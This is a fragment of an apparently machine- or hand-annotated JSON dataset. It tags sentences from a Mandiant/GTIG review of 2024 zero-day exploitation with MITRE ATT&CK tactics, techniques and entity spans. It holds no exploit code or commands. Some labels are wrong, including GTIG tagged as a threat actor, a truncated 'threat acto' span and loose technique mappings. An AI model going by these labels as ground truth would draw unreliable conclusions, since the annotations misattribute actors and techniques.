"mandiant-35_mandiant_report-p1-s13-ca2b26", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 13, "context_before": "Our analysis represents exploitation tracked by GTIG but may not reflect all zero-day exploitation.", "sentence_text": "Key Takeaways\nZero-day exploitation continues to grow gradually.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Zero-day exploitation is growing", "entities": [ { "text": "Zero-day exploitation", "start": 14, "end": 35, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s14-a7d9d0", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 14, "context_before": "Key Takeaways\nZero-day exploitation continues to grow gradually.", "sentence_text": "The 75 zero-day vulnerabilities exploited in 2024 follow a pattern that has emerged over the past four years.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "75 zero-day vulnerabilities were exploited", "entities": [ { "text": "exploited", "start": 32, "end": 41, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s15-bf5bac", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 15, "context_before": "The 75 zero-day vulnerabilities exploited in 2024 follow a pattern that has emerged over the past four years.", "sentence_text": "While individual year counts have fluctuated, the average trendline indicates that the rate of zero-day exploitation continues to grow at a slow but steady pace.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Zero-day exploitation continues to grow", "entities": [ { "text": "zero-day exploitation", "start": 95, "end": 116, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s16-f86bfc", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 16, "context_before": "While individual year counts have fluctuated, the average trendline indicates that the rate of zero-day exploitation continues to grow at a slow but steady pace.", "sentence_text": "Enterprise-focused technology targeting continues to expand.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "Enterprise-focused technology targeting is expanding", "entities": [ { "text": "targeting ", "start": 30, "end": 40, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s17-a5c685", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 17, "context_before": "Enterprise-focused technology targeting continues to expand.", "sentence_text": "GTIG continued to observe an increase in adversary exploitation of enterprise-specific technologies throughout 2024.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit enterprise-specific technologies", "entities": [ { "text": " exploitation ", "start": 50, "end": 64, "label": "Action" }, { "text": "GTIG", "start": 0, "end": 4, "label": "ThreatActor" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s18-b00048", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 18, "context_before": "GTIG continued to observe an increase in adversary exploitation of enterprise-specific technologies throughout 2024.", "sentence_text": "In 2023, 37% of zero-day vulnerabilities targeted enterprise products.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "Zero-day vulnerabilities targeted enterprise products", "entities": [ { "text": " targeted", "start": 40, "end": 49, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s19-279530", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 19, "context_before": "In 2023, 37% of zero-day vulnerabilities targeted enterprise products.", "sentence_text": "This jumped to 44% in 2024, primarily fueled by the increased exploitation of security and networking software and appliances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s20-f8a6e4", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 20, "context_before": "This jumped to 44% in 2024, primarily fueled by the increased exploitation of security and networking software and appliances.", "sentence_text": "Attackers are increasing their focus on security and networking products.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s21-1cc5d1", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 21, "context_before": "Attackers are increasing their focus on security and networking products.", "sentence_text": "Zero-day vulnerabilities in security software and appliances were a high-value target in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s22-6995b8", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 22, "context_before": "Zero-day vulnerabilities in security software and appliances were a high-value target in 2024.", "sentence_text": "We identified 20 security and networking vulnerabilities, which was over 60% of all zero-day exploitation of enterprise technologies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s23-3e177d", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 23, "context_before": "We identified 20 security and networking vulnerabilities, which was over 60% of all zero-day exploitation of enterprise technologies.", "sentence_text": "Exploitation of these products, compared to end-user technologies, can more effectively and efficiently lead to extensive system and network compromises, and we anticipate adversaries will continue to increase their focus on these technologies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s24-555113", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 24, "context_before": "Exploitation of these products, compared to end-user technologies, can more effectively and efficiently lead to extensive system and network compromises, and we anticipate adversaries will continue to increase their focus on these technologies.", "sentence_text": "Vendors are changing the game.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s25-71cbdd", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 25, "context_before": "Vendors are changing the game.", "sentence_text": "Vendor investments in exploit mitigations are having a clear impact on where threat actors are able to find success.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s26-2fe3a3", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 26, "context_before": "Vendor investments in exploit mitigations are having a clear impact on where threat actors are able to find success.", "sentence_text": "We are seeing notable decreases in zero-day exploitation of some historically popular targets such as browsers and mobile operating systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s27-1f674d", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 27, "context_before": "We are seeing notable decreases in zero-day exploitation of some historically popular targets such as browsers and mobile operating systems.", "sentence_text": "Actors conducting cyber espionage still lead attributed zero-day exploitation.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Conduct zero-day exploitation", "entities": [ { "text": "Actors ", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "conducting cyber espionage", "start": 7, "end": 33, "label": "Action" }, { "text": "zero-day exploitation", "start": 56, "end": 77, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s28-ab7b06", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 28, "context_before": "Actors conducting cyber espionage still lead attributed zero-day exploitation.", "sentence_text": "Between government-backed groups and customers of commercial surveillance vendors (CSVs), actors conducting cyber espionage operations accounted for over 50% of the vulnerabilities we could attribute in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s29-c589b9", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 29, "context_before": "Between government-backed groups and customers of commercial surveillance vendors (CSVs), actors conducting cyber espionage operations accounted for over 50% of the vulnerabilities we could attribute in 2024.", "sentence_text": "People's Republic of China (PRC)-backed groups exploited five zero-days, and customers of CSVs exploited eight, continuing their collective leading role in zero-day exploitation.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit zero-day vulnerabilities", "entities": [ { "text": "People's Republic of China (PRC)-backed groups", "start": 0, "end": 46, "label": "ThreatActor" }, { "text": "and customers of CSVs ", "start": 73, "end": 95, "label": "ThreatActor" }, { "text": "exploited ", "start": 95, "end": 105, "label": "Action" }, { "text": "exploited five zero-days", "start": 47, "end": 71, "label": "Action" }, { "text": "zero-day exploitation", "start": 156, "end": 177, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s30-07045f", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 30, "context_before": "People's Republic of China (PRC)-backed groups exploited five zero-days, and customers of CSVs exploited eight, continuing their collective leading role in zero-day exploitation.", "sentence_text": "For the first year ever, we also attributed the exploitation of the same volume of 2024 zero-days (five) to North Korean actors mixing espionage and financially motivated operations as we did to PRC-backed groups.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit vulnerabilities for mixed espionage and financial operations", "entities": [ { "text": "North Korean actors ", "start": 108, "end": 128, "label": "ThreatActor" }, { "text": " PRC-backed groups", "start": 194, "end": 212, "label": "ThreatActor" }, { "text": "mixing espionage and financially motivated operations", "start": 128, "end": 181, "label": "Action" }, { "text": "exploitation ", "start": 48, "end": 61, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s31-d9ca72", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 31, "context_before": "For the first year ever, we also attributed the exploitation of the same volume of 2024 zero-days (five) to North Korean actors mixing espionage and financially motivated operations as we did to PRC-backed groups.", "sentence_text": "Looking at the Numbers GTIG tracked 75 exploited-in-the-wild zero-day vulnerabilities that were disclosed in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s32-2c885f", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 32, "context_before": "Looking at the Numbers GTIG tracked 75 exploited-in-the-wild zero-day vulnerabilities that were disclosed in 2024.", "sentence_text": "This number appears to be consistent with a consolidating upward trend that we have observed over the last four years.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s33-68d58b", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 33, "context_before": "This number appears to be consistent with a consolidating upward trend that we have observed over the last four years.", "sentence_text": "After an initial spike in 2021, yearly counts have fluctuated but not returned to the lower numbers we saw in 2021 and prior.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s34-8c48af", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 34, "context_before": "After an initial spike in 2021, yearly counts have fluctuated but not returned to the lower numbers we saw in 2021 and prior.", "sentence_text": "While there are multiple factors involved in discovery of zero-day exploitation, we note that continued improvement and ubiquity of detection capabilities along with more frequent public disclosures have both resulted in larger numbers of detected zero-day exploitation compared to what was observed prior to 2021.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s35-9592cf", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 35, "context_before": "While there are multiple factors involved in discovery of zero-day exploitation, we note that continued improvement and ubiquity of detection capabilities along with more frequent public disclosures have both resulted in larger numbers of detected zero-day exploitation compared to what was observed prior to 2021.", "sentence_text": "The remaining 42 zero-day vulnerabilities targeted end-user technologies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s36-c71df1", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 36, "context_before": "The remaining 42 zero-day vulnerabilities targeted end-user technologies.", "sentence_text": "Enterprise Exploitation Expands in 2024 as Browser and Mobile Exploitation", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s37-c83c26", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 37, "context_before": "Enterprise Exploitation Expands in 2024 as Browser and Mobile Exploitation", "sentence_text": "All of the vulnerabilities in this category were used to exploit browsers, mobile devices, and desktop operating systems.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit vulnerabilities in browsers, mobile devices, and desktop operating systems", "entities": [ { "text": "exploit", "start": 57, "end": 64, "label": "Action" }, { "text": " browsers", "start": 64, "end": 73, "label": "Infrastructure_Indicator" }, { "text": " mobile devices", "start": 74, "end": 89, "label": "Infrastructure_Indicator" }, { "text": " desktop operating systems", "start": 94, "end": 120, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s38-c2a5b1", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 38, "context_before": "All of the vulnerabilities in this category were used to exploit browsers, mobile devices, and desktop operating systems.", "sentence_text": "Zero-day exploitation of browsers and mobile devices fell drastically, decreasing by about a third for browsers and by about half for mobile devices compared to what we observed last year (17 to 11 for browsers, and 17 to 9 for mobile).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s39-385d59", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 39, "context_before": "Zero-day exploitation of browsers and mobile devices fell drastically, decreasing by about a third for browsers and by about half for mobile devices compared to what we observed last year (17 to 11 for browsers, and 17 to 9 for mobile).", "sentence_text": "Chrome was the primary focus of browser zero-day exploitation in 2024, likely reflecting the browser's popularity among billions of users.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1189", "name": "Drive-by Compromise" } ], "procedure": "Focus zero-day exploitation on the Chrome browser", "entities": [ { "text": "Chrome ", "start": 0, "end": 7, "label": "Infrastructure_Indicator" }, { "text": " browser zero-day exploitation", "start": 31, "end": 61, "label": "Action" }, { "text": " browser", "start": 92, "end": 100, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s40-59597b", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 40, "context_before": "Chrome was the primary focus of browser zero-day exploitation in 2024, likely reflecting the browser's popularity among billions of users.", "sentence_text": "Exploit chains made up of multiple zero-day vulnerabilities continue to be almost exclusively (~90%) used to target mobile devices.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Use multi-zero-day exploit chains to target mobile devices", "entities": [ { "text": " target", "start": 108, "end": 115, "label": "Action" }, { "text": "Exploit chains", "start": 0, "end": 14, "label": "Action" }, { "text": "mobile devices", "start": 116, "end": 130, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s41-223f16", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 41, "context_before": "Exploit chains made up of multiple zero-day vulnerabilities continue to be almost exclusively (~90%) used to target mobile devices.", "sentence_text": "Third-party components continue to be exploited in Android devices, a trend we discussed in last year’s analysis.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1203", "name": "Exploitation for Client Execution" } ], "procedure": "Exploit third-party components in Android devices.", "entities": [ { "text": "exploited in Android devices", "start": 38, "end": 66, "label": "Action" }, { "text": "Third-party components", "start": 0, "end": 22, "label": "Infrastructure_Indicator" }, { "text": "Android devices", "start": 51, "end": 66, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s42-9978b3", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 42, "context_before": "Third-party components continue to be exploited in Android devices, a trend we discussed in last year’s analysis.", "sentence_text": "In 2023, five of the seven zero-days exploited in Android devices were flaws in third-party components.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1203", "name": "Exploitation for Client Execution" } ], "procedure": "exploit zero-days in third-party components of Android devices", "entities": [ { "text": " zero-days exploited", "start": 26, "end": 46, "label": "Action" }, { "text": "Android devices", "start": 50, "end": 65, "label": "Infrastructure_Indicator" }, { "text": " third-party components", "start": 79, "end": 102, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s43-2c1855", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 43, "context_before": "In 2023, five of the seven zero-days exploited in Android devices were flaws in third-party components.", "sentence_text": "In 2024, three of the seven zero-days exploited in Android were found in third-party components.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1203", "name": "Exploitation for Client Execution" } ], "procedure": "exploit zero-days in third-party components of Android", "entities": [ { "text": " zero-days exploited", "start": 27, "end": 47, "label": "Action" }, { "text": "Android", "start": 51, "end": 58, "label": "Infrastructure_Indicator" }, { "text": " third-party components", "start": 72, "end": 95, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s44-ee7d3b", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 44, "context_before": "In 2024, three of the seven zero-days exploited in Android were found in third-party components.", "sentence_text": "Third-party components are likely perceived as lucrative targets for exploit development since they can enable attackers to compromise many different makes and models of devices across the Android ecosystem.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.001", "name": "Malware" } ], "procedure": "target third-party components for exploit development to compromise Android devices", "entities": [ { "text": "Third-party components ", "start": 0, "end": 23, "label": "Infrastructure_Indicator" }, { "text": "exploit development", "start": 69, "end": 88, "label": "Action" }, { "text": "Android ecosystem", "start": 189, "end": 206, "label": "Infrastructure_Indicator" }, { "text": "attackers", "start": 111, "end": 120, "label": "ThreatActor" }, { "text": " compromise ", "start": 123, "end": 135, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s45-a85082", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 45, "context_before": "Third-party components are likely perceived as lucrative targets for exploit development since they can enable attackers to compromise many different makes and models of devices across the Android ecosystem.", "sentence_text": "2024 saw an increase in the total number of zero-day vulnerabilities affecting desktop operating systems (OSs) (22 in 2024 vs. 17 in 2023), indicating that OSs continue to be a strikingly large target.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s46-70bb79", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 46, "context_before": "2024 saw an increase in the total number of zero-day vulnerabilities affecting desktop operating systems (OSs) (22 in 2024 vs. 17 in 2023), indicating that OSs continue to be a strikingly large target.", "sentence_text": "The proportional increase was even greater, with OS vulnerabilities making up just 17% of total zero-day exploitation in 2023, compared to nearly 30% in 2024.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "increase exploitation of OS vulnerabilities via zero-days", "entities": [ { "text": "OS", "start": 49, "end": 51, "label": "Infrastructure_Indicator" }, { "text": "zero-day exploitation", "start": 96, "end": 117, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s47-99516c", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 47, "context_before": "The proportional increase was even greater, with OS vulnerabilities making up just 17% of total zero-day exploitation in 2023, compared to nearly 30% in 2024.", "sentence_text": "Enterprise Technologies\nIn 2024, GTIG identified the exploitation of 33 zero-days in enterprise software and appliances.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploit zero-days in enterprise software and appliances", "entities": [ { "text": " exploitation ", "start": 52, "end": 66, "label": "Action" }, { "text": "enterprise software and appliances", "start": 85, "end": 119, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s48-d82116", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 48, "context_before": "Enterprise Technologies\nIn 2024, GTIG identified the exploitation of 33 zero-days in enterprise software and appliances.", "sentence_text": "We consider enterprise products to include those mainly utilized by businesses or in a business environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s49-d862a6", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 49, "context_before": "We consider enterprise products to include those mainly utilized by businesses or in a business environment.", "sentence_text": "While the absolute number is slightly lower than what we saw in 2023 (36 vulnerabilities), the proportion of enterprise-focused vulnerabilities has risen from 37% in 2023 to 44% in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s50-a0f928", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 50, "context_before": "While the absolute number is slightly lower than what we saw in 2023 (36 vulnerabilities), the proportion of enterprise-focused vulnerabilities has risen from 37% in 2023 to 44% in 2024.", "sentence_text": "Security and network tools and devices are designed to connect widespread systems and devices with high permissions required to manage the products and their services, making them highly valuable targets for threat actors seeking efficient access into enterprise networks.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "target security/network tools and devices to gain access to enterprise networks", "entities": [ { "text": "threat actors", "start": 208, "end": 221, "label": "ThreatActor" }, { "text": "seeking", "start": 222, "end": 229, "label": "Action" }, { "text": "network tools and devices", "start": 13, "end": 38, "label": "Infrastructure_Indicator" }, { "text": " systems", "start": 73, "end": 81, "label": "Infrastructure_Indicator" }, { "text": " devices ", "start": 85, "end": 94, "label": "Infrastructure_Indicator" }, { "text": "access into enterprise networks", "start": 240, "end": 271, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s51-d91093", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 51, "context_before": "Security and network tools and devices are designed to connect widespread systems and devices with high permissions required to manage the products and their services, making them highly valuable targets for threat actors seeking efficient access into enterprise networks.", "sentence_text": "Endpoint detection and response (EDR) tools are not usually equipped to work on these products, limiting available capabilities to monitor them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s52-2bcd6a", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 52, "context_before": "Endpoint detection and response (EDR) tools are not usually equipped to work on these products, limiting available capabilities to monitor them.", "sentence_text": "Additionally, exploit chains are not generally required to exploit these systems, giving extensive power to individual vulnerabilities that can single-handedly achieve remote code execution or privilege escalation.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "exploit systems using individual vulnerabilities to achieve remote code execution or privilege escalation", "entities": [ { "text": " exploit ", "start": 58, "end": 67, "label": "Action" }, { "text": "systems", "start": 73, "end": 80, "label": "Infrastructure_Indicator" }, { "text": " achieve remote code execution", "start": 159, "end": 189, "label": "Action" }, { "text": "privilege escalation", "start": 193, "end": 213, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s53-fb0591", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 53, "context_before": "Additionally, exploit chains are not generally required to exploit these systems, giving extensive power to individual vulnerabilities that can single-handedly achieve remote code execution or privilege escalation.", "sentence_text": "Over the last several years, we have also tracked a general increase of enterprise vendors targeted.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s54-fb38ab", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 54, "context_before": "Over the last several years, we have also tracked a general increase of enterprise vendors targeted.", "sentence_text": "In 2024, we identified 18 unique enterprise vendors targeted by zero-days.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s55-9eebb6", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 55, "context_before": "In 2024, we identified 18 unique enterprise vendors targeted by zero-days.", "sentence_text": "While this number is slightly less than the 22 observed in 2023, it remains higher than all prior years' counts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s56-af59a7", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 56, "context_before": "While this number is slightly less than the 22 observed in 2023, it remains higher than all prior years' counts.", "sentence_text": "It is also a stark increase in the proportion of enterprise vendors for the year, given that the 18 unique enterprise vendors were out of 20 total vendors for 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s57-5e005f", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 57, "context_before": "It is also a stark increase in the proportion of enterprise vendors for the year, given that the 18 unique enterprise vendors were out of 20 total vendors for 2024.", "sentence_text": "The proportion of zero-days exploited in enterprise devices in 2024 reinforces a trend that suggests that attackers are intentionally targeting products that can provide expansive access and fewer opportunities for detection.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploit zero-days in enterprise devices; target products for expansive access and evasion", "entities": [ { "text": "attackers", "start": 106, "end": 115, "label": "ThreatActor" }, { "text": "enterprise devices", "start": 41, "end": 59, "label": "Infrastructure_Indicator" }, { "text": " targeting", "start": 133, "end": 143, "label": "Action" }, { "text": " zero-days exploited", "start": 17, "end": 37, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s58-466baf", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 58, "context_before": "The proportion of zero-days exploited in enterprise devices in 2024 reinforces a trend that suggests that attackers are intentionally targeting products that can provide expansive access and fewer opportunities for detection.", "sentence_text": "Exploitation by Vendor The vendors affected by multiple 2024 zero-day vulnerabilities generally fell into two categories: big tech (Microsoft, Google, and Apple) and vendors who supply security and network-focused products.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s59-d75448", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 59, "context_before": "Exploitation by Vendor The vendors affected by multiple 2024 zero-day vulnerabilities generally fell into two categories: big tech (Microsoft, Google, and Apple) and vendors who supply security and network-focused products.", "sentence_text": "Apple slid to the fourth most frequently exploited vendor this year, with detected exploitation of only five zero-days.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1203", "name": "Exploitation for Client Execution" } ], "procedure": "Exploit five Apple zero-day vulnerabilities detected during the year.", "entities": [ { "text": "exploited vendor", "start": 41, "end": 57, "label": "Action" }, { "text": "detected exploitation", "start": 74, "end": 95, "label": "Action" }, { "text": "five zero-days", "start": 104, "end": 118, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s60-15e09d", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 60, "context_before": "Apple slid to the fourth most frequently exploited vendor this year, with detected exploitation of only five zero-days.", "sentence_text": "Ivanti was third most frequently targeted with seven zero-days, reflecting increased threat actor focus on networking and security products.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "target Ivanti with seven zero-days; focus on networking/security products", "entities": [ { "text": "targeted ", "start": 33, "end": 42, "label": "Action" }, { "text": "threat acto", "start": 85, "end": 96, "label": "ThreatActor" }, { "text": " networking", "start": 106, "end": 117, "label": "Infrastructure_Indicator" }, { "text": " security products", "start": 121, "end": 139, "label": "Infrastructure_Indicator" }, { "text": "Ivanti", "start": 0, "end": 6, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s61-16122c", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 61, "context_before": "Ivanti was third most frequently targeted with seven zero-days, reflecting increased threat actor focus on networking and security products.", "sentence_text": "Ivanti's placement in the top three reflects a new and crucial change, where a security vendor was targeted more frequently than a popular end-user technology-focused vendor.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Target a security vendor more frequently than a popular end-user technology-focused vendor.", "entities": [ { "text": "Ivanti", "start": 0, "end": 6, "label": "Infrastructure_Indicator" }, { "text": "targeted more frequently than a popular end-user technology-focused vendor", "start": 99, "end": 173, "label": "Action" }, { "text": "security vendor", "start": 79, "end": 94, "label": "Infrastructure_Indicator" }, { 